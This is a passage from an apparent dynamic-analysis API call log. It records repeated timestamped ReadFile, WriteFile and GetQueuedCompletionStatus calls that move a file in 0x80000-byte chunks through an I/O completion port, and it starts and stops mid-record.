lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.610] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.612] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.613] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.613] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.623] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.626] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.627] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.627] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.628] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.630] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.631] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.632] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.657] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.659] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.660] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.660] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.662] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.663] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.665] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.665] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.675] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.676] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.678] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.678] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.705] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.707] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.708] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.708] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.726] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.728] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.729] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.729] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.740] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.741] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.743] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.743] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.762] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.764] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.766] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.766] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.767] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.769] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.770] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.770] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.788] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.790] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.791] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.792] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.793] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.795] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.796] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.797] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.814] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.816] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.817] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.817] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.819] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.820] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.822] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.822] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.851] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.853] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.855] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.855] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.856] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.858] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.859] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.859] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.869] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.872] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.873] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.873] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.875] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.876] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.878] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.878] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.910] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.912] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.913] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.913] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.915] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.916] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.918] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.918] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.928] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.929] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.931] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.931] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0138.932] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.934] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.935] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.935] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, 